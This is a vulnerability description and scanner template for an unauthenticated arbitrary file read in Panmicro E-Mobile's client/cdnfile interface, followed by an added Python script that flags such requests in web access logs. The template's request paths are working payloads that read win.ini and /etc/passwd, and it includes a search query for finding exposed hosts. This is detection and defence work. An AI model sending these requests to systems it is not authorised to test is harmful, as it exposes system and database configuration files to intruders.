Vulnerability Description
The Panmicro E-Mobile client/cdnfile interface has an arbitrary file reading vulnerability. Unauthenticated attackers can use this vulnerability to read important system files, database configuration files, and so on.
id: panmicro-arbitrary-file-read
info:
  name: Panmicro E-Mobile System - Arbitrary File Read
  author: s4e-io
  severity: high
  description: |
    The Panmicro E-Mobile client/cdnfile interface has an arbitrary file reading vulnerability. Unauthenticated attackers can use this vulnerability to read important system files, database configuration files, and so on.
  reference:
    - http://cn-sec.com/archives/3182931.html
    - https://cn-sec.com/archives/3188605.html
  metadata:
    verified: true
    max-request: 2
    vendor: panmicro
    product: e-mobile-system
    fofa-query: app="泛微-EMobile"
  tags: panmicro,e-mobile,lfi,vuln
http:
  - method: GET
    path:
      - "{{BaseURL}}/client/cdnfile/1C/Windows/win.ini?windows"
      - "{{BaseURL}}/client/cdnfile/C/etc/passwd?linux"
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"bit app support","fonts","extensions") || regex("root:.*:0:0:", body)'
          - 'contains_any(header,"application/octet-stream", "text/plain")'
          - 'contains(header," attachment; filename=")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a0047304502205f341075adc19dc549dcae50179197ddda37232e1fbbad2116fd0b9476a7f25f022100cc87b03630e3320b8141c32c02453efd0a23ebdf28c1c1ef6c32bf218dc52c20:922c64590222798bb761d5b6d8e72950
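
A defender-side check for web access logs that flags requests to the client/cdnfile interface and separates the two file names the template requests from other traffic. This is an added example, not part of the template or the original page; the Combined Log Format, the verdict labels and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
PREFIX = "/client/cdnfile/"
# File names requested by the template; add local configuration file names as needed.
OS_FILE_MARKERS = ("windows/win.ini", "etc/passwd")

# Constructed sample log lines (documentation IP ranges, not from a real system).
SAMPLE_LOG = """\
198.51.100.7 - - [12/Sep/2024:10:01:02 +0800] "GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1" 200 1843 "-" "curl/8.0"
198.51.100.7 - - [12/Sep/2024:10:01:03 +0800] "GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1" 404 0 "-" "curl/8.0"
203.0.113.20 - - [12/Sep/2024:10:05:40 +0800] "GET /client/cdnfile/assets/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.15 - - [12/Sep/2024:10:06:11 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def classify(line):
    """Return a finding dict for a request to the cdnfile interface, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Drop the query string and percent-decode before comparing paths.
    path = unquote(urlsplit(m["target"]).path)
    if not path.lower().startswith(PREFIX):
        return None
    tail = path[len(PREFIX):].lower()
    hit = any(tail.endswith(marker) for marker in OS_FILE_MARKERS)
    if hit and m["status"] == "200":
        verdict = "served-200"      # same status the template requires for a match
    elif hit:
        verdict = "probe-rejected"  # requested a system file, server did not answer 200
    else:
        verdict = "review"          # other cdnfile request; check against expected usage
    return {"ip": m["ip"], "time": m["ts"], "path": path, "verdict": verdict}


def triage(log_text):
    """Classify every line and keep only requests that touched the interface."""
    return [f for f in map(classify, log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

A `served-200` entry is the one to investigate first: the response body and the source address should be checked against the matcher conditions in the template.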